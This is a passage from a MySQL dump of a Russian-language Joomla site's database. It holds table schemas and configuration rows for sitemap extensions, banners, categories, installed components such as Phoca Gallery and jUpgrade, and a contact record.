'),(24,'com_resource',1,'-1{include_articles=1\nmax_articles=\ncat_priority=-1\ncat_changefreq=-1\narticle_priority=-1\narticle_changefreq=-1\n}'),(25,'com_rdautos',1,'-1{include_vehicles=1\ncat_priority=0.5\ncat_changefreq=weekly\nvehicle_priority=0.5\nvehicle_changefreq=weekly\n}'),(26,'com_rokdownloads',1,'-1{include_files=1\nmax_files=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nfile_priority=-1\nfile_changefreq=-1\n}'),(27,'com_rsgallery2',1,'-1{include_images=1\nmax_images=\nmax_age=\nimages_order=orderding\ncat_priority=0.5\ncat_changefreq=weekly\nimage_priority=0.5\nimage_changefreq=weekly\n}'),(28,'com_sectionex',1,'-1{expand_categories=1\nexpand_sections=1\nshow_unauth=0\ncat_priority=-1\ncat_changefreq=-1\nart_priority=-1\nart_changefreq=-1\n}'),(29,'com_cmsshopbuilder',1,'-1{include_items=1\nmax_items=\nmax_age=\ncat_priority=-1\ncat_changefreq=-1\nitem_priority=-1\nitem_changefreq=-1\n}'),(30,'com_sobi2',1,'-1{include_entries=1\nmax_entries=\nmax_age=\nentries_order=a.ordering\nentries_orderdir=DESC\ncat_priority=-1\ncat_changefreq=weekly\nentry_priority=-1\nentry_changefreq=weekly\n}'),(31,'com_virtuemart',1,'-1{include_products=1\ninclude_product_images=0\nproduct_image_license_url=\ncat_priority=0.5\ncat_changefreq=weekly\nprod_priority=0.5\nprod_changefreq=weekly\n}'),(32,'com_weblinks',1,'-1{include_links=1\nmax_links=\ncat_priority=-1\ncat_changefreq=-1\nlink_priority=-1\nlink_changefreq=-1\n}'),(33,'com_yoflash',1,'-1{include_yoflash=1\nmax_games=\ncat_priority=-1\ncat_changefreq=-1\ngames_priority=-1\ngames_changefreq=-1\n}'),(34,'com_zoo',1,'-1{include_categories=1\ninclude_items=1\ncat_priority=-1\ncat_changefreq=-1\nitem_priority=-1\nitem_changefreq=-1\n}');
/*!40000 ALTER TABLE `j25_xmap_ext` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_xmap_items`
--

DROP TABLE IF EXISTS `j25_xmap_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_xmap_items` (
  `uid` varchar(100) NOT NULL,
  `itemid` int(11) NOT NULL,
  `view` varchar(10) NOT NULL,
  `sitemap_id` int(11) NOT NULL,
  `properties` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`uid`,`itemid`,`view`,`sitemap_id`),
  KEY `uid` (`uid`,`itemid`),
  KEY `view` (`view`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_xmap_items`
--

LOCK TABLES `j25_xmap_items` WRITE;
/*!40000 ALTER TABLE `j25_xmap_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_xmap_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_xmap_sitemap`
--

DROP TABLE IF EXISTS `j25_xmap_sitemap`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_xmap_sitemap` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) DEFAULT NULL,
  `alias` varchar(255) DEFAULT NULL,
  `introtext` text,
  `metadesc` text,
  `metakey` text,
  `attribs` text,
  `selections` text,
  `excluded_items` text,
  `is_default` int(1) DEFAULT '0',
  `state` int(2) DEFAULT NULL,
  `access` int(11) DEFAULT NULL,
  `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  `count_xml` int(11) DEFAULT NULL,
  `count_html` int(11) DEFAULT NULL,
  `views_xml` int(11) DEFAULT NULL,
  `views_html` int(11) DEFAULT NULL,
  `lastvisit_xml` int(11) DEFAULT NULL,
  `lastvisit_html` int(11) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_xmap_sitemap`
--

LOCK TABLES `j25_xmap_sitemap` WRITE;
/*!40000 ALTER TABLE `j25_xmap_sitemap` DISABLE KEYS */;
INSERT INTO `j25_xmap_sitemap` VALUES (1,'mainmenu','mainmenu','',NULL,NULL,'{\"showintro\":\"1\",\"show_menutitle\":\"1\",\"classname\":\"\",\"columns\":\"\",\"exlinks\":\"img_blue.gif\",\"compress_xml\":\"1\",\"beautify_xml\":\"1\",\"include_link\":\"1\",\"news_publication_name\":\"\"}','{\"mainmenu\":{\"priority\":\"0.5\",\"changefreq\":\"weekly\",\"ordering\":0}}',NULL,1,0,1,'2015-11-20 10:43:57',0,0,0,0,0,0),(2,'Карта сайта 1','main-map','',NULL,NULL,'{\"showintro\":\"1\",\"show_menutitle\":\"1\",\"classname\":\"\",\"columns\":\"\",\"exlinks\":\"img_blue.gif\",\"compress_xml\":\"1\",\"beautify_xml\":\"1\",\"include_link\":\"1\",\"news_publication_name\":\"news\"}','{\"mainmenu\":{\"priority\":\"0.5\",\"changefreq\":\"daily\",\"ordering\":0},\"other-menu\":{\"priority\":\"0.5\",\"changefreq\":\"weekly\",\"ordering\":1},\"dop-menu\":{\"priority\":\"0.5\",\"changefreq\":\"weekly\",\"ordering\":2}}',NULL,0,1,1,'2015-11-20 10:45:30',27,0,28,0,1448024603,0);
/*!40000 ALTER TABLE `j25_xmap_sitemap` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_banner`
--

DROP TABLE IF EXISTS `jos_banner`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_banner` (
  `bid` int(11) NOT NULL AUTO_INCREMENT,
  `cid` int(11) NOT NULL DEFAULT '0',
  `type` varchar(30) NOT NULL DEFAULT 'banner',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `imptotal` int(11) NOT NULL DEFAULT '0',
  `impmade` int(11) NOT NULL DEFAULT '0',
  `clicks` int(11) NOT NULL DEFAULT '0',
  `imageurl` varchar(100) NOT NULL DEFAULT '',
  `clickurl` varchar(200) NOT NULL DEFAULT '',
  `date` datetime DEFAULT NULL,
  `showBanner` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `custombannercode` text,
  `catid` int(10) unsigned NOT NULL DEFAULT '0',
  `description` text NOT NULL,
  `sticky` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `tags` text NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`bid`),
  KEY `viewbanner` (`showBanner`),
  KEY `idx_banner_catid` (`catid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_banner`
--

LOCK TABLES `jos_banner` WRITE;
/*!40000 ALTER TABLE `jos_banner` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_banner` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_bannerclient`
--

DROP TABLE IF EXISTS `jos_bannerclient`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_bannerclient` (
  `cid` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `contact` varchar(255) NOT NULL DEFAULT '',
  `email` varchar(255) NOT NULL DEFAULT '',
  `extrainfo` text NOT NULL,
  `checked_out` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out_time` time DEFAULT NULL,
  `editor` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`cid`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_bannerclient`
--

LOCK TABLES `jos_bannerclient` WRITE;
/*!40000 ALTER TABLE `jos_bannerclient` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_bannerclient` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_bannertrack`
--

DROP TABLE IF EXISTS `jos_bannertrack`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_bannertrack` (
  `track_date` date NOT NULL,
  `track_type` int(10) unsigned NOT NULL,
  `banner_id` int(10) unsigned NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_bannertrack`
--

LOCK TABLES `jos_bannertrack` WRITE;
/*!40000 ALTER TABLE `jos_bannertrack` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_bannertrack` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_categories`
--

DROP TABLE IF EXISTS `jos_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `section` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`section`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_categories`
--

LOCK TABLES `jos_categories` WRITE;
/*!40000 ALTER TABLE `jos_categories` DISABLE KEYS */;
INSERT INTO `jos_categories` VALUES (1,0,'Администрация','','2010-11-06-16-49-07','','com_contact_details','left','',1,0,'0000-00-00 00:00:00',NULL,1,0,0,'');
/*!40000 ALTER TABLE `jos_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_components`
--

DROP TABLE IF EXISTS `jos_components`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_components` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL DEFAULT '',
  `link` varchar(255) NOT NULL DEFAULT '',
  `menuid` int(11) unsigned NOT NULL DEFAULT '0',
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `admin_menu_link` varchar(255) NOT NULL DEFAULT '',
  `admin_menu_alt` varchar(255) NOT NULL DEFAULT '',
  `option` varchar(50) NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `admin_menu_img` varchar(255) NOT NULL DEFAULT '',
  `iscore` tinyint(4) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `enabled` tinyint(4) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `parent_option` (`parent`,`option`(32))
) ENGINE=MyISAM AUTO_INCREMENT=81 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_components`
--

LOCK TABLES `jos_components` WRITE;
/*!40000 ALTER TABLE `jos_components` DISABLE KEYS */;
INSERT INTO `jos_components` VALUES (1,'Banners','',0,0,'','Banner Management','com_banners',0,'js/ThemeOffice/component.png',0,'track_impressions=0\ntrack_clicks=0\ntag_prefix=\n\n',1),(2,'Banners','',0,1,'option=com_banners','Active Banners','com_banners',1,'js/ThemeOffice/edit.png',0,'',1),(3,'Clients','',0,1,'option=com_banners&c=client','Manage Clients','com_banners',2,'js/ThemeOffice/categories.png',0,'',1),(4,'Web Links','option=com_weblinks',0,0,'','Manage Weblinks','com_weblinks',0,'js/ThemeOffice/component.png',0,'show_comp_description=1\ncomp_description=\nshow_link_hits=1\nshow_link_description=1\nshow_other_cats=1\nshow_headings=1\nshow_page_title=1\nlink_target=0\nlink_icons=\n\n',1),(5,'Links','',0,4,'option=com_weblinks','View existing weblinks','com_weblinks',1,'js/ThemeOffice/edit.png',0,'',1),(6,'Categories','',0,4,'option=com_categories&section=com_weblinks','Manage weblink categories','',2,'js/ThemeOffice/categories.png',0,'',1),(7,'Contacts','option=com_contact',0,0,'','Edit contact details','com_contact',0,'js/ThemeOffice/component.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(8,'Contacts','',0,7,'option=com_contact','Edit contact details','com_contact',0,'js/ThemeOffice/edit.png',1,'',1),(9,'Categories','',0,7,'option=com_categories&section=com_contact_details','Manage contact categories','',2,'js/ThemeOffice/categories.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(10,'Polls','option=com_poll',0,0,'option=com_poll','Manage Polls','com_poll',0,'js/ThemeOffice/component.png',0,'',1),(11,'News Feeds','option=com_newsfeeds',0,0,'','News Feeds Management','com_newsfeeds',0,'js/ThemeOffice/component.png',0,'',1),(12,'Feeds','',0,11,'option=com_newsfeeds','Manage News Feeds','com_newsfeeds',1,'js/ThemeOffice/edit.png',0,'show_headings=1\nshow_name=1\nshow_articles=1\nshow_link=1\nshow_cat_description=1\nshow_cat_items=1\nshow_feed_image=1\nshow_feed_description=1\nshow_item_description=1\nfeed_word_count=0\n\n',1),(13,'Categories','',0,11,'option=com_categories&section=com_newsfeeds','Manage Categories','',2,'js/ThemeOffice/categories.png',0,'',1),(14,'User','option=com_user',0,0,'','','com_user',0,'',1,'',1),(15,'Search','option=com_search',0,0,'option=com_search','Search Statistics','com_search',0,'js/ThemeOffice/component.png',1,'enabled=0\n\n',1),(16,'Categories','',0,1,'option=com_categories&section=com_banner','Categories','',3,'',1,'',1),(17,'Wrapper','option=com_wrapper',0,0,'','Wrapper','com_wrapper',0,'',1,'',1),(18,'Mail To','',0,0,'','','com_mailto',0,'',1,'',1),(19,'Media Manager','',0,0,'option=com_media','Media Manager','com_media',0,'',1,'upload_extensions=bmp,csv,doc,epg,gif,ico,jpg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,EPG,GIF,ICO,JPG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\nupload_maxsize=10000000\nfile_path=images\nimage_path=images/stories\nrestrict_uploads=1\nallowed_media_usergroup=3\ncheck_mime=1\nimage_extensions=bmp,gif,jpg,png\nignore_extensions=\nupload_mime=image/jpeg,image/gif,image/png,image/bmp,application/x-shockwave-flash,application/msword,application/excel,application/pdf,application/powerpoint,text/plain,application/x-zip\nupload_mime_illegal=text/html\nenable_flash=0\n\n',1),(20,'Articles','option=com_content',0,0,'','','com_content',0,'',1,'show_noauth=0\nshow_title=0\nlink_titles=0\nshow_intro=1\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_item_navigation=0\nshow_readmore=0\nshow_vote=0\nshow_icons=0\nshow_pdf_icon=0\nshow_print_icon=0\nshow_email_icon=0\nshow_hits=0\nfeed_summary=0\nfilter_tags=\nfilter_attritbutes=\n\n',1),(21,'Configuration Manager','',0,0,'','Configuration','com_config',0,'',1,'',1),(22,'Installation Manager','',0,0,'','Installer','com_installer',0,'',1,'',1),(23,'Language Manager','',0,0,'','Languages','com_languages',0,'',1,'administrator=ru-RU\nsite=ru-RU',1),(24,'Mass mail','',0,0,'','Mass Mail','com_massmail',0,'',1,'mailSubjectPrefix=\nmailBodySuffix=\n\n',1),(25,'Menu Editor','',0,0,'','Menu Editor','com_menus',0,'',1,'',1),(27,'Messaging','',0,0,'','Messages','com_messages',0,'',1,'',1),(28,'Modules Manager','',0,0,'','Modules','com_modules',0,'',1,'',1),(29,'Plugin Manager','',0,0,'','Plugins','com_plugins',0,'',1,'',1),(30,'Template Manager','',0,0,'','Templates','com_templates',0,'',1,'',1),(31,'User Manager','',0,0,'','Users','com_users',0,'',1,'allowUserRegistration=1\nnew_usertype=Registered\nuseractivation=1\nfrontend_userparams=1\n\n',1),(32,'Cache Manager','',0,0,'','Cache','com_cache',0,'',1,'',1),(33,'Control Panel','',0,0,'','Control Panel','com_cpanel',0,'',1,'',1),(34,'Xmap','option=com_xmap',0,0,'option=com_xmap','Xmap','com_xmap',0,'js/ThemeOffice/component.png',0,'',1),(75,'Users','',0,56,'option=com_phocagallery&view=phocagalleryusers','Users','com_phocagallery',8,'components/com_phocagallery/assets/images/icon-16-pg-menu-users.png',0,'',1),(76,'Info','',0,56,'option=com_phocagallery&view=phocagalleryin','Info','com_phocagallery',9,'components/com_phocagallery/assets/images/icon-16-pg-menu-info.png',0,'',1),(73,'Category Comments','',0,56,'option=com_phocagallery&view=phocagallerycos','Category Comments','com_phocagallery',6,'components/com_phocagallery/assets/images/icon-16-pg-menu-comment.png',0,'',1),(74,'Image Comments','',0,56,'option=com_phocagallery&view=phocagallerycoimgs','Image Comments','com_phocagallery',7,'components/com_phocagallery/assets/images/icon-16-pg-menu-comment-img.png',0,'',1),(72,'Image Rating','',0,56,'option=com_phocagallery&view=phocagalleryraimg','Image Rating','com_phocagallery',5,'components/com_phocagallery/assets/images/icon-16-pg-menu-vote-img.png',0,'',1),(71,'Category Rating','',0,56,'option=com_phocagallery&view=phocagalleryra','Category Rating','com_phocagallery',4,'components/com_phocagallery/assets/images/icon-16-pg-menu-vote.png',0,'',1),(56,'Phoca Gallery','option=com_phocagallery',0,0,'option=com_phocagallery','Phoca Gallery','com_phocagallery',0,'components/com_phocagallery/assets/images/icon-16-pg-menu.png',0,'categories_columns=3\nequal_percentage_width=1\ndisplay_image_categories=1\ncategories_box_width=100%\nimage_categories_size=5\ncategories_image_ordering=1\ncategories_display_avatar=0\ndisplay_subcategories=0\ndisplay_empty_categories=0\nhide_categories=\nshow_categories=\ndisplay_access_category=0\ndefault_pagination_categories=0\npagination_categories=5;10;15;20;50\nfont_color=#b36b00\nbackground_color=#fcfcfc\nbackground_color_hover=#f5f5f5\nimage_background_color=#f5f5f5\nimage_background_shadow=shadow2\nborder_color=#e8e8e8\nborder_color_hover=#b36b00\nmargin_box=5\npadding_box=5\ndisplay_new=0\ndisplay_hot=0\ndisplay_name=0\ndisplay_icon_detail=0\ndisplay_icon_download=0\ndisplay_icon_folder=0\nfont_size_name=12\nchar_length_name=15\ncategory_box_space=0\ndisplay_categories_sub=0\ndisplay_subcat_page=2\ndisplay_category_icon_image=0\ncategory_image_ordering=1\ndisplay_back_button=1\ndisplay_categories_back_button=1\ndefault_pagination_category=20\npagination_category=5;10;15;20;50\ndisplay_img_desc_box=0\nfont_size_img_desc=10\nimg_desc_box_height=30\nchar_length_img_desc=300\ndisplay_categories_cv=0\ndisplay_subcat_page_cv=2\ndisplay_category_icon_image_cv=1\ncategory_image_ordering_cv=1\ndisplay_back_button_cv=1\ndisplay_categories_back_button_cv=1\ncategories_columns_cv=1\ndisplay_image_categories_cv=1\nimage_categories_size_cv=4\ndetail_window=5\ndetail_window_background_color=#ffffff\nmodal_box_overlay_color=#000000\nmodal_box_overlay_opacity=0.3\nmodal_box_border_color=#6b6b6b\nmodal_box_border_width=2\nsb_slideshow_delay=5\nsb_lang=en\nhighslide_class=rounded-white\nhighslide_opacity=0\nhighslide_outline_type=rounded-white\nhighslide_fullimg=0\nhighslide_close_button=0\nhighslide_slideshow=1\njak_slideshow_delay=5\njak_orientation=none\njak_description=1\njak_description_height=10\ndisplay_description_detail=0\ndisplay_title_description=0\nfont_size_desc=11\nfont_color_desc=#333333\ndescription_detail_height=16\ndescription_lightbox_font_size=12\ndescription_lightbox_font_color=#ffffff\ndescription_lightbox_bg_color=#000000\nslideshow_delay=3000\nslideshow_pause=0\nslideshow_random=0\ndetail_buttons=1\nphocagallery_width=\nphocagallery_center=0\ncategory_ordering=1\nimage_ordering=1\ngallery_metadesc=\ngallery_metakey=\nalt_value=1\nenable_user_cp=0\nenable_upload_avatar=1\nenable_avatar_approve=0\nenable_usercat_approve=0\nenable_usersubcat_approve=0\nuser_subcat_count=5\nmax_create_cat_char=1000\nenable_userimage_approve=0\nmax_upload_char=1000\nupload_maxsize=3145728\nupload_maxres_width=3072\nupload_maxres_height=2304\nuser_images_max_size=20971520\nenable_java=0\nenable_java_admin=1\njava_resize_width=-1\njava_resize_height=-1\njava_box_width=480\njava_box_height=480\ndisplay_rating=0\ndisplay_rating_img=0\ndisplay_comment=0\ndisplay_comment_img=0\ncomment_width=500\nmax_comment_char=1000\ndisplay_comment_nopup=0\nexternal_comment_system=0\nfb_comment_app_id=\nfb_comment_width=550\nfb_comment_count=\nenable_piclens=0\nstart_piclens=0\npiclens_image=1\nswitch_image=0\nswitch_width=640\nswitch_height=480\nswitch_fixed_size=0\nenable_overlib=0\nol_bg_color=#666666\nol_fg_color=#f6f6f6\nol_tf_color=#000000\nol_cf_color=#ffffff\noverlib_overlay_opacity=0.7\noverlib_image_rate=\ncreate_watermark=0\nwatermark_position_x=center\nwatermark_position_y=middle\ndisplay_icon_vm=0\ndisplay_category_statistics=0\ndisplay_main_cat_stat=1\ndisplay_lastadded_cat_stat=1\ncount_lastadded_cat_stat=3\ndisplay_mostviewed_cat_stat=1\ncount_mostviewed_cat_stat=3\ndisplay_camera_info=0\nexif_information=FILE.FileName;FILE.FileDateTime;FILE.FileSize;FILE.MimeType;COMPUTED.Height;COMPUTED.Width;COMPUTED.IsColor;COMPUTED.ApertureFNumber;IFD0.Make;IFD0.Model;IFD0.Orientation;IFD0.XResolution;IFD0.YResolution;IFD0.ResolutionUnit;IFD0.Software;IFD0.DateTime;IFD0.Exif_IFD_Pointer;IFD0.GPS_IFD_Pointer;EXIF.ExposureTime;EXIF.FNumber;EXIF.ExposureProgram;EXIF.ISOSpeedRatings;EXIF.ExifVersion;EXIF.DateTimeOriginal;EXIF.DateTimeDigitized;EXIF.ShutterSpeedValue;EXIF.ApertureValue;EXIF.ExposureBiasValue;EXIF.MaxApertureValue;EXIF.MeteringMode;EXIF.LightSource;EXIF.Flash;EXIF.FocalLength;EXIF.SubSecTimeOriginal;EXIF.SubSecTimeDigitized;EXIF.ColorSpace;EXIF.ExifImageWidth;EXIF.ExifImageLength;EXIF.SensingMethod;EXIF.CustomRendered;EXIF.ExposureMode;EXIF.WhiteBalance;EXIF.DigitalZoomRatio;EXIF.FocalLengthIn35mmFilm;EXIF.SceneCaptureType;EXIF.GainControl;EXIF.Contrast;EXIF.Saturation;EXIF.Sharpness;EXIF.SubjectDistanceRange;GPS.GPSLatitudeRef;GPS.GPSLatitude;GPS.GPSLongitudeRef;GPS.GPSLongitude;GPS.GPSAltitudeRef;GPS.GPSAltitude;GPS.GPSTimeStamp;GPS.GPSStatus;GPS.GPSMapDatum;GPS.GPSDateStamp\ndisplay_categories_geotagging=0\ncategories_lng=\ncategories_lat=\ncategories_zoom=2\ncategories_map_width=\ncategories_map_height=500\ndisplay_icon_geotagging=0\ndisplay_category_geotagging=0\ncategory_map_width=\ncategory_map_height=400\npagination_thumbnail_creation=0\nclean_thumbnails=0\nenable_thumb_creation=1\ncrop_thumbnail=5\njpeg_quality=100\nenable_picasa_loading=1\npicasa_load_pagination=20\nicon_format=gif\nlarge_image_width=800\nlarge_image_height=800\nmedium_image_width=100\nmedium_image_height=100\nsmall_image_width=50\nsmall_image_height=50\nfront_modal_box_width=680\nfront_modal_box_height=560\nadmin_modal_box_width=680\nadmin_modal_box_height=520\nfolder_permissions=0755\njfile_thumbs=1\n\n',1),(70,'Themes','',0,56,'option=com_phocagallery&view=phocagalleryt','Themes','com_phocagallery',3,'components/com_phocagallery/assets/images/icon-16-pg-menu-theme.png',0,'',1),(69,'Categories','',0,56,'option=com_phocagallery&view=phocagallerycs','Categories','com_phocagallery',2,'components/com_phocagallery/assets/images/icon-16-pg-menu-cat.png',0,'',1),(68,'Images','',0,56,'option=com_phocagallery&view=phocagallerys','Images','com_phocagallery',1,'components/com_phocagallery/assets/images/icon-16-pg-menu-gal.png',0,'',1),(67,'Control Panel','',0,56,'option=com_phocagallery','Control Panel','com_phocagallery',0,'components/com_phocagallery/assets/images/icon-16-pg-control-panel.png',0,'',1),(79,'DL Calculator','option=com_dlcalculator',0,0,'option=com_dlcalculator','DL Calculator','com_dlcalculator',0,'js/ThemeOffice/component.png',0,'',1),(80,'jUpgrade','option=com_jupgrade',0,0,'option=com_jupgrade','jUpgrade','com_jupgrade',0,'components/com_jupgrade/images/jupgrade.png',0,'mode=1\ndirectory=jupgrade\nprefix_old=jos_\nprefix_new=j25_\n',1);
/*!40000 ALTER TABLE `jos_components` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_contact_details`
--

DROP TABLE IF EXISTS `jos_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_contact_details` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `con_position` varchar(255) DEFAULT NULL,
  `address` text,
  `suburb` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `postcode` varchar(100) DEFAULT NULL,
  `telephone` varchar(255) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `misc` mediumtext,
  `image` varchar(255) DEFAULT NULL,
  `imagepos` varchar(20) DEFAULT NULL,
  `email_to` varchar(255) DEFAULT NULL,
  `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) NOT NULL DEFAULT '',
  `webpage` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_contact_details`
--

LOCK TABLES `jos_contact_details` WRITE;
/*!40000 ALTER TABLE `jos_contact_details` DISABLE KEYS */;
INSERT INTO `jos_contact_details` VALUES (1,'Администрация','2010-11-06-16-49-40','','','','','','','','','','',NULL,'',0,1,0,'0000-00-00 00:00:00',1,'show_name=0\nshow_position=0\nshow_email=0\nshow_street_address=0\nshow_suburb=0\nshow_state=0\nshow_postcode=0\nshow_country=0\nshow_telephone=0\nshow_mobile=0\nshow_fax=0\nshow_webpage=0\nshow_misc=0\nshow_image=0\nallow_vcard=0\ncontact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_email_form=1\nemail_description=\nshow_email_copy=1\nbanned_email=\nbanned_subject=\nbanned_text=',62,1,0,'','');
/*!40000 ALTER TABLE `jos_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_content`
--

DROP TABLE IF EXISTS `jos_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_content` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `title_alias` varchar(255) NOT NULL DEFAULT '',
  `introtext` mediumtext NOT NULL,
  `fulltext` mediumtext NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `sectionid` int(11) unsigned NOT NULL DEFAULT '0',
  `mask` int(11) unsigned NOT NULL DEFAULT '0',
  `catid` int(11) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
